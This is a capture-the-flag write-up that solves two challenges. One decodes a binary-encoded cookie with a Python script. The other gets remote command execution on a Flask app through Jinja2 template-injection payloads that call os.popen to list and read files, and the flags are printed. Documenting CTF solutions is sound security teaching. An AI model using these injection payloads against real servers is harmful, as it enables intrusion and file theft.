rooCookie & SSTI golf

# rooCookie & SSTI golf ## rooCookie According to the description, it seems that the author set the flag as the password. And he said ***'I fed my website some cookies so it would remember me'*** => Maybe flag in cookies ![](https://i.imgur.com/Ib4H8dY.png) ### View source code - We get a function createToken(text) ,it performs the function of encrypting a text and then assign it to document.cookie ```javascript function createToken(text) { let encrypted = ""; for (let i = 0; i < text.length; i++) { encrypted += ((text[i].charCodeAt(0)-43+1337) >> 0).toString(2) } document.cookie = encrypted } document.cookie = "token=101100000111011000000110101110011101100000001010111110010101101111101011110111010111001110101001011101001100001011000000010101111101101011111011010011000010100101110101001101001010010111010101111110101011011111011000000110110000001101100001011010111110110110000000101011100101010100101110100110000101011101111010111000110110000010101011101001011000100110101110110101001111101010111111010101000001101011011011010100010110101110110101011011111010100010110101101101101100001011010110111110101000011101011111001010100010110101101101101100000101010011111010100111110101011011011010111000010101000010101011100101011000101110100110000" ``` - Notice there is a predefined document.cookie => This is flag ???? - If so we just reverse the createToken() function to get the flag ### Analysis of the coding process - First each character in text will go through the **charCodeAt()** function => the function will return the Unicode value of that character - That unicode value will continue to do the calculation **(-43+1337)** - **'>>'** is right shift operator but **'>> 0'** so the result does not change - And finally convert it to binary ### Decryption script ```python= token = "101100000111011000000110101110011101100000001010111110010101101111101011110111010111001110101001011101001100001011000000010101111101101011111011010011000010100101110101001101001010010111010101111110101011011111011000000110110000001101100001011010111110110110000000101011100101010100101110100110000101011101111010111000110110000010101011101001011000100110101110110101001111101010111111010101000001101011011011010100010110101110110101011011111010100010110101101101101100001011010110111110101000011101011111001010100010110101101101101100000101010011111010100111110101011011011010111000010101000010101011100101011000101110100110000" decryp = '' k=11 for i in range (len(token)//11-1): decryp+=chr(int(token[k:k+11],2)-1337+43) k=k+11 print(decryp) #sername="roo" & password="ictf{h0p3_7ha7_wa5n7_t00_b4d}" ``` #### Flag : **ictf{h0p3_7ha7_wa5n7_t00_b4d}** ## SSTI golf ### Check source code ```python #!/usr/bin/env python3 from flask import Flask, render_template_string, request, Response app = Flask(__name__) @app.route('/') def index(): return Response(open(__file__).read(), mimetype='text/plain') @app.route('/ssti') def ssti(): query = request.args['query'] if 'query' in request.args else '...' if len(query) > 48: return "Too long!" return render_template_string(query) app.run('0.0.0.0', 1337) ``` - The function **'/'** will show source code - The function **'/ssti'** is mapped with the **'/ssti'** path and takes the query parameter => **/ssti?query=** - The input **query** will be checked for length if it exceeds 48 then return "To long" - If less than 48 characters will return **render_template_string(query)** > [Note](https://workshops.devax.academy/security-for-developers/module9/fix_ssti_vulnerability.html) : The page uses **render_template_string** for rendering the HTML response.The function renders the template directly from a string which can trigger a potential Server-Side Template Injection (SSTI) if the string has been modified to include a valid python code. ### Exploit - Challenge is written in Python and runs the Jinja2 template.I found a basic payload of **{{7*7}}**. I injected the inputs query with the payload and analyzed the responses. => Successful !!! ![](https://i.imgur.com/Yh3hHSM.png) - I use this payload to list all file names : `{{lipsum.__globals__['os'].popen('ls').read()}}` ![](https://i.imgur.com/z6BBQOA.png) - Because the file name is too long I used the command `cat *` to read all the files in the current folder `{{lipsum.__globals__.os.popen('cat *').read()}}` ![](https://i.imgur.com/wxuS4HM.png) #### Flag : **ictf{F!1+3r5s!?}** #### Refer to the connection https://chowdera.com/2020/12/20201221231521371q.html https://workshops.devax.academy/security-for-developers/module9/fix_ssti_vulnerability.html https://hackmd.io/@Chivato/HyWsJ31dI#What-is-a-SSTI